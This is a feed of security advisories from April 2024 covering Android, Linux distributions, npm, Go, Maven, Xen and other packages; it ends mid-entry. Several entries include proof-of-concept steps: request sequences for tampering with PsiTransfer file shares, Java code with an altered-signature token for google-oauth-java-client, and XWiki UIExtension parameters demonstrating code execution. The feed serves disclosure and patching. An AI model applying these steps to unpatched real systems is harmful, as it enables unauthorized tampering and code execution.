04.04.2024 17:40:47	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
05.04.2024 23:14:40	slackware	[SSA:2024-096-01] tigervnc (high)	New tigervnc packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```extra/tigervnc/tigervnc-1.12.0-i586-6_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including the latest patches for several security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Heap buffer overread/data leakage in ProcAppleDRICreatePixmap. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31082 https://www.cve.org/CVERecord?id=CVE-2024-31083 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-6_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-6_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-5.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-5.txzMD5 signaturesSlackware 15.0 package:1b9d9300689d99dc01d93a13bd7ca5f5 tigervnc-1.12.0-i586-6_slack15.0.txzSlackware x86_64 15.0 package:6b54b9fd74517d203dd671d1bd4adda4 tigervnc-1.12.0-x86_64-6_slack15.0.txzSlackware -current package:ec1ad0a545c495e4a3397db00969ce39 tigervnc-1.13.1-i586-5.txzSlackware x86_64 -current package:489f6eaadacd1e56f4428dd7e4e5cb5d tigervnc-1.13.1-x86_64-5.txzInstallation instructions*Upgrade the package as root:`# upgradepkg tigervnc-1.12.0-i586-6_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-096-01
05.04.2024 20:15:28	npm	[NPM:GHSA-2P2X-P7WJ-J5H2] PsiTransfer: File integrity violation (moderate)	### SummaryThe absence of restrictions on the endpoint, which is designed for uploading files, allows an attacker who received the id of a file distribution to change the files that are in this distribution.### DetailsVulnerable endpoint: PATCH /files/{{id}}### PoC1. Create a file distribution.2. Go to the link address for downloading files and download the file (in this case, the attacker receives the file id from the download request).3. Send a PATCH /files/{{id}} request with arbitrary content in the request body.Thus, the file with the specified id will be changed. What the attacker specifies in the body of the request will be added to the end of the original content. In the future, users will download the modified file.### ImpactThe vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2P2X-P7WJ-J5H2
05.04.2024 20:15:29	npm	[NPM:GHSA-XG8V-M2MH-45M6] PsiTransfer: Violation of the integrity of file distribution (moderate)	SummaryThe absence of restrictions on the endpoint, which allows you to create a path for uploading a file in a file distribution, allows an attacker to add arbitrary files to the distribution.DetailsVulnerable endpoint: POST /filesPoC1. Create a file distribution.<img width="1434" alt="Снимок экрана 2024-03-17 в 21 27 30" src="https://github.com/psi-4ward/psitransfer/assets/163760990/4634a6f7-6e7d-486e-9929-76156aaa1340">2. Go to the link address (id of the file distribution is needed by an attacker to upload files there).<img width="1426" alt="Снимок экрана 2024-03-17 в 21 27 35" src="https://github.com/psi-4ward/psitransfer/assets/163760990/a57c910c-69e2-4b07-985d-b0a46c69891a">3. Send a POST /files. As the value of the Upload-Metadata header we specify the sid parameter with the id of the file distribution obtained in the second step. In the response from the server in the Location header we get the path for uploading a new file to the file distribution.<img width="1403" alt="Снимок экрана 2024-03-17 в 21 28 09" src="https://github.com/psi-4ward/psitransfer/assets/163760990/8b839fb8-2c0b-432f-8503-e4c42a840056">5. Send a PATCH /files/{{id}} request with arbitrary content in the request body. Id is taken from the previous step.<img width="1067" alt="Снимок экрана 2024-03-17 в 21 28 51" src="https://github.com/psi-4ward/psitransfer/assets/163760990/c5b2acf3-fdf1-4780-8c63-61a7f19338df">Result:<img width="1432" alt="Снимок экрана 2024-03-17 в 21 29 05" src="https://github.com/psi-4ward/psitransfer/assets/163760990/c49b17c8-e1d2-4894-b6e2-f50b9663fca7"><img width="1424" alt="Снимок экрана 2024-03-17 в 21 29 15" src="https://github.com/psi-4ward/psitransfer/assets/163760990/e4a1e07d-3e77-4f61-a4e7-ceee4a5a7b8e">ImpactThe vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XG8V-M2MH-45M6
05.04.2024 18:03:32	go	[GO-2024-2683] Improper handling of node names in JWT claims assertions ingithub.com/hashicorp/consul (high)	HashiCorp Consul does not properly validate the node or segment names prior tointerpolation and usage in JWT claim assertions with the auto config RPC.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2683
05.04.2024 15:15:37	alpinelinux	[ALPINE:CVE-2024-31083] xorg-server, xwayland vulnerability (high)	[From CVE-2024-31083] A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-31083
05.04.2024 02:12:31	go	[GO-2024-2682] Denial of service via connection starvation in github.com/quic-go/quic-go (high)	An attacker can cause its peer to run out of memory by sending a large number ofNEW_CONNECTION_ID frames that retire old connection IDs. The receiver issupposed to respond to each retirement frame with a RETIRE_CONNECTION_ID frame.The attacker can prevent the receiver from sending out (the vast majority of)these RETIRE_CONNECTION_ID frames by collapsing the peers congestion window (byselectively acknowledging received packets) and by manipulating the peer's RTTestimate.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2682
05.04.2024 03:00:00	freebsd	[FREEBSD:C2431C4E-622C-4D92-996D-D8B5258AE8C9] electron{27,28} -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-2885. Security: backported fix for CVE-2024-2883. Security: backported fix for CVE-2024-2887. Security: backported fix for CVE-2024-2886.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C2431C4E-622C-4D92-996D-D8B5258AE8C9
04.04.2024 23:46:28	go	[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)	The Casa OS Login page has a username enumeration vulnerability in the loginpage that was patched in Casa OS v0.4.7. The issue exists because theapplication response differs depending on whether the username or password isincorrect, allowing an attacker to enumerate usernames by observing theapplication response. For example, if the username is incorrect, the applicationreturns "User does not exist" with return code "10006", while if the password isincorrect, it returns "User does not exist or password is invalid" with returncode "10013". This allows an attacker to determine if a username exists withoutknowing the password.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
05.04.2024 17:40:56	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
08.04.2024 21:47:56	slackware	[SSA:2024-099-01] libarchive	New libarchive packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libarchive-3.7.3-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: Fix possible vulnerability in tar error reporting introduced in f27c173 by JiaT75. For more information, see: https://github.com/libarchive/libarchive/commit/f27c173d17dc807733b3a4f8c11207c3f04ff34f https://github.com/libarchive/libarchive/pull/2101 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.3-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.3-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.3-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:bc692c90578a2481490bb8dafe26c402 libarchive-3.7.3-i586-1_slack15.0.txzSlackware x86_64 15.0 package:000f0b1f75682c0c075cd946c0f149c9 libarchive-3.7.3-x86_64-1_slack15.0.txzSlackware -current package:0d4b64d874931fbbc43c1de33de03c03 l/libarchive-3.7.3-i586-1.txzSlackware x86_64 -current package:a08b01ad133cb91972699e1a3e7a432f l/libarchive-3.7.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libarchive-3.7.3-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-099-01
08.04.2024 14:14:30	ubuntu	[USN-6722-1] Django vulnerability (critical)	Django accounts could be hijacked through password reset requests.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6722-1
08.04.2024 03:00:00	oraclelinux	[ELSA-2024-1687] nodejs:20 security update (important)	nodejs[1:20.11.1-1]- Rebase to version 20.11.1- Fixes: CVE-2024-21892 CVE-2024-21896 CVE-2024-22017 CVE-2024-22019 (high)- Fixes: CVE-2023-46809 CVE-2024-21890 CVE-2024-21891 (medium)nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1687
08.04.2024 03:00:00	oraclelinux	[ELSA-2024-1688] nodejs:20 security update (important)	nodejs[1:20.11.1-1]- Rebase to version 20.11.1- Fixes: CVE-2024-21892 CVE-2024-21896 CVE-2024-22017 CVE-2024-22019 (high)- Fixes: CVE-2023-46809 CVE-2024-21890 CVE-2024-21891 (medium)nodejs-nodemonnodejs-packaging	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1688
08.04.2024 03:00:00	oraclelinux	[ELSA-2024-1692] less security update (moderate)	[590-3]- Fix CVE-2022-48624- Resolves: RHEL-26265	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1692
08.04.2024 03:00:00	redhat	[RHSA-2024:1690] varnish security update (important)	Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1690
08.04.2024 03:00:00	redhat	[RHSA-2024:1691] varnish security update (important)	Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1691
08.04.2024 03:00:00	redhat	[RHSA-2024:1692] less security update (moderate)	The "less" utility is a text file browser that resembles "more", but allowsusers to move backwards in the file as well as forwards. Since "less" does notread the entire input file at startup, it also starts more quickly than ordinarytext editors.Security Fix(es):* less: missing quoting of shell metacharacters in LESSCLOSE handling(CVE-2022-48624)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1692
08.04.2024 03:00:00	redhat	[RHSA-2024:1687] nodejs:20 security update (important)	Node.js is a software development platform for building fast and scalablenetwork applications in the JavaScript programming language.Security Fix(es):* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)* nodejs: path traversal by monkey-patching buffer internals (CVE-2024-21896)* nodejs: multiple permission model bypasses due to improper path traversal sequence sanitization (CVE-2024-21891)* nodejs: improper handling of wildcards in --allow-fs-read and --allow-fs-write (CVE-2024-21890)* nodejs: setuid() does not drop all privileges due to io_uring (CVE-2024-22017)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1687
08.04.2024 03:00:00	redhat	[RHSA-2024:1688] nodejs:20 security update (important)	Node.js is a software development platform for building fast and scalablenetwork applications in the JavaScript programming language.Security Fix(es):* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)* nodejs: path traversal by monkey-patching buffer internals (CVE-2024-21896)* nodejs: multiple permission model bypasses due to improper path traversal sequence sanitization (CVE-2024-21891)* nodejs: improper handling of wildcards in --allow-fs-read and --allow-fs-write (CVE-2024-21890)* nodejs: setuid() does not drop all privileges due to io_uring (CVE-2024-22017)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1688
08.04.2024 18:45:38	npm	[NPM:GHSA-R956-2553-VVHR] React Native Sms User Consent Intent Redirection Vulnerability (moderate)	A vulnerability, which was classified as critical, has been found in kyivstarteam react-native-sms-user-consent up to 1.1.4 on Android. Affected by this issue is the function `registerReceiver` of the file `android/src/main/java/ua/kyivstar/reactnativesmsuserconsent/SmsUserConsentModule.kt`. The manipulation leads to improper export of android application components. Attacking locally is a requirement. Upgrading to version 1.1.5 is able to address this issue. The name of the patch is 5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259508.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R956-2553-VVHR
08.04.2024 18:42:15	maven	[MAVEN:GHSA-2V42-XP3J-47M4] Xuxueli xxl-job template injection vulnerability (low)	A vulnerability classified as problematic was found in Xuxueli xxl-job version 2.4.0. This vulnerability affects the function `deserialize` of the file `com/xxl/job/core/util/JdkSerializeTool.java` of the component `Template Handler`. The manipulation leads to injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259480.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2V42-XP3J-47M4
08.04.2024 16:47:06	npm	[NPM:GHSA-5PGG-2G8V-P4X9] SheetJS Regular Expression Denial of Service (ReDoS) (high)	SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5PGG-2G8V-P4X9
08.04.2024 17:39:53	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
10.04.2024 00:16:47	ubuntu	[USN-6721-2] X.Org X Server regression	A regression was fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6721-2
09.04.2024 21:15:08	alpinelinux	[ALPINE:CVE-2024-22423] yt-dlp vulnerability (high)	[From CVE-2024-22423] yt-dlp is a youtube-dl fork with additional features and fixes. The patch that addressed CVE-2023-40581 attempted to prevent RCE when using `--exec` with `%q` by replacing double quotes with two double quotes. However, this escaping is not sufficient, and still allows expansion of environment variables. Support for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version 2021.04.11. yt-dlp version 2024.04.09 fixes this issue by properly escaping `%`. It replaces them with `%%cd:~,%`, a variable that expands to nothing, leaving only the leading percent. It is recommended to upgrade yt-dlp to version 2024.04.09 as soon as possible. Also, always be careful when using `--exec`, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous. For Windows users who are not able to upgrade, avoid using any output template expansion in `--exec` other than `{}` (filepath); if expansion in `--exec` is needed, verify the fields you are using do not contain `"`, `\|` or `&`; and/or instead of using `--exec`, write the info json and load the fields from it instead.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-22423
09.04.2024 19:29:00	xen	[XSA-455] x86: Incorrect logic for BTC/SRSO mitigations	ISSUE DESCRIPTIONBecause of a logical error in XSA-407 (Branch Type Confusion), themitigation is not applied properly when it is intended to be used.XSA-434 (Speculative Return Stack Overflow) uses the sameinfrastructure, so is equally impacted.For more details, see: https://xenbits.xen.org/xsa/advisory-407.html https://xenbits.xen.org/xsa/advisory-434.htmlIMPACTXSAs 407 and 434 are unmitigated, even when the patches are in place.VULNERABLE SYSTEMSAll versions of Xen containing the XSA-407 fixes are vulnerable.See XSAs 407 and 434 for details on which hardware is susceptible toBTC/SRSO.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-455
09.04.2024 18:11:26	maven	[MAVEN:GHSA-HW42-3568-WJ87] google-oauth-java-client improperly verifies cryptographic signature (high)	### SummaryThe vulnerability impacts only users of the `IdTokenVerifier` class. The verify method in `IdTokenVerifier` does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from valid provider, not from someone else.An attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application. If the application sends verified `IdToken` to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request. Reporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor### PatchesThe issue was fixed in the 1.33.3 version of the library### Proof of ConceptTo reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.``` /** A default http transport factory for testing / static class DefaultHttpTransportFactory implements HttpTransportFactory { public HttpTransport create() { return new NetHttpTransport(); } }// The below token has some modified bits in the signature private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE = "eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG" +"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm" +"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy" +"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26" +"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ" + "QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby" +"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx" + "ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg";IdTokenVerifier tokenVerifier = new IdTokenVerifier.Builder() .setClock(clock) .setCertificatesLocation("https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com") .setHttpTransportFactory(new DefaultHttpTransportFactory()) .build();// verification will return true despite modified signature for versions <1.33.3tokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));```### Remediation and MitigationUpdate to the version 1.33.3 or higher If the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: [google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)### TimelineDate reported: 12 Dec 2021Date fixed: 13 Apr 2022Date disclosed: 2 May 2022### For more informationIf you have any questions or comments about this advisory: Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HW42-3568-WJ87
09.04.2024 16:53:55	ubuntu	[USN-6701-4] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6701-4
09.04.2024 16:46:16	ubuntu	[USN-6726-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6726-1
09.04.2024 16:19:04	ubuntu	[USN-6725-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6725-1
09.04.2024 21:53:31	maven	[MAVEN:GHSA-M65C-WMW9-VMPP] Apache Zeppelin: Replacing other users notebook, bypassing any permissions (moderate)	Authentication Bypass by Spoofing vulnerability by replacing to exsiting notes in Apache Zeppelin. This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0.Users are recommended to upgrade to version 0.11.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M65C-WMW9-VMPP
09.04.2024 21:53:18	maven	[MAVEN:GHSA-FRC2-W2CC-X794] Eclipse Kura LogServlet vulnerability (high)	In Eclipse Kura LogServlet component included in versions 5.0.0 to 5.4.1, a specifically crafted request to the servlet can allow an unauthenticated user to retrieve the device logs. Also, downloaded logs may be used by an attacker to perform privilege escalation by using the session id of an authenticated user reported in logs.This issue affects org.eclipse.kura:org.eclipse.kura.web2 version range [2.0.600, 2.4.0], which is included in Eclipse Kura version range [5.0.0, 5.4.1]	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRC2-W2CC-X794
09.04.2024 19:28:05	maven	[MAVEN:GHSA-6623-C6MR-6737] Apache Zeppelin: Denial of service with invalid notebook name (moderate)	Improper Input Validation vulnerability in Apache Zeppelin when creating a new note from Zeppelin's UI. This issue affects Apache Zeppelin from 0.10.1 before 0.11.0.Users are recommended to upgrade to version 0.11.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6623-C6MR-6737
09.04.2024 19:23:54	maven	[MAVEN:GHSA-RR59-H6RH-V84V] Apache Zeppelin SAP: connecting to a malicious SAP server allowed it to perform XXE (moderate)	Improper Input Validation vulnerability in Apache Zeppelin SAP. This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.For more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP componentNOTE: This vulnerability only affects products that are no longer supported by the maintainer.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RR59-H6RH-V84V
09.04.2024 19:23:03	maven	[MAVEN:GHSA-PRVG-RH5H-74JR] Apache Zeppelin CSRF vulnerability in the Credentials page (moderate)	Cross-Site Request Forgery (CSRF) vulnerability in Credential page of Apache Zeppelin allows an attacker to submit malicious request. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PRVG-RH5H-74JR
09.04.2024 15:17:25	ubuntu	[USN-6724-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6724-1
09.04.2024 15:07:28	ubuntu	[USN-6723-1] Bind vulnerabilities (high)	Bind could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6723-1
09.04.2024 14:50:00	xen	[XSA-454] x86 HVM hypercalls may trigger Xen bug check	ISSUE DESCRIPTIONUnlike 32-bit PV guests, HVM guests may switch freely between 64-bit andother modes. This in particular means that they may set registers usedto pass 32-bit-mode hypercall arguments to values outside of the range32-bit code would be able to set them to.When processing of hypercalls takes a considerable amount of time,the hypervisor may choose to invoke a hypercall continuation. Doing soinvolves putting (perhaps updated) hypercall arguments in respectiveregisters. For guests not running in 64-bit mode this further involvesa certain amount of translation of the values.Unfortunately internal sanity checking of these translated valuesassumes high halves of registers to always be clear when invoking ahypercall. When this is found not to be the case, it triggers aconsistency check in the hypervisor and causes a crash.IMPACTA HVM or PVH guest can cause a hypervisor crash, causing a Denial ofService (DoS) of the entire host.VULNERABLE SYSTEMSAll Xen versions from at least 3.2 onwards are vulnerable. Earlierversions have not been inspected.Only x86 systems are vulnerable. Arm systems are not vulnerable.Only HVM or PVH guests can leverage the vulnerability. PV guests cannotleverage the vulnerability.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-454
09.04.2024 19:20:42	maven	[MAVEN:GHSA-G64R-XF39-Q4P5] Apache Zeppelin Path Traversal vulnerability (moderate)	Improper Input Validation vulnerability in Apache Zeppelin.By adding relative path indicators (e.g `..`), attackers can see the contents for any files in the filesystem that the server account can access. This issue affects Apache Zeppelin from 0.9.0 before 0.11.0.Users are recommended to upgrade to version 0.11.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G64R-XF39-Q4P5
09.04.2024 21:53:10	maven	[MAVEN:GHSA-V4MM-Q8FV-R2W5] WildFly Elytron: SSRF security issue (high)	A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V4MM-Q8FV-R2W5
09.04.2024 04:15:49	alpinelinux	[ALPINE:CVE-2024-27983] nodejs, nodejs-current vulnerability (high)	[From CVE-2024-27983] An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27983
09.04.2024 03:00:00	oraclelinux	[ELSA-2024-1690] varnish security update (important)	varnish[6.0.13-1]- new version 6.0.13- Resolves: RHEL-30378 - varnish:6/varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)varnish-modules	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1690
09.04.2024 03:00:00	oraclelinux	[ELSA-2024-1691] varnish security update (important)	[6.6.2-4.1]- Resolves: RHEL-30387 - varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)[6.6.2-4]- Add parameters h2_rst_allowance and h2_rst_allowance_period to mitigate CVE-2023-44487- Resolves: RHEL-12817	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1691
09.04.2024 03:00:00	redhat	[RHSA-2024:1719] rear security update (moderate)	Relax-and-Recover is a recovery and system migration utility. The utility produces a bootable image and restores from backup using this image. It allows to restore to different hardware and can therefore be also used as a migration utility.Security Fix(es):* rear: creates a world-readable initrd (CVE-2024-23301)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1719
09.04.2024 17:39:56	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
10.04.2024 20:16:54	maven	[MAVEN:GHSA-C2GG-4GQ4-JV5J] XWiki Platform remote code execution from account through UIExtension parameters (critical)	### ImpactParameters of UI extensions are always interpreted as Velocity code and executed with programming rights. Any user with edit right on any document like the user's own profile can create UI extensions. This allows remote code execution and thereby impacts the confidentiality, integrity and availability of the whole XWiki installation.To reproduce, edit your user profile with the object editor and add a UIExtension object with the following values:```Extension Point ID: org.xwiki.platform.panels.ApplicationsExtension ID: platform.panels.myFakeApplicationExtension parameters: label=I got programming right: $services.security.authorization.hasAccess('programming')target=Main.WebHometargetQueryString=icon=icon:bombExtension Scope: "Current User".```Save the document and open any document. If an application entry with the text "I got programming right: true" is displayed, the attack succeeded, if the code in "label" is displayed literally, the XWiki installation isn't vulnerable.### PatchesThis vulnerability has been patched in XWiki 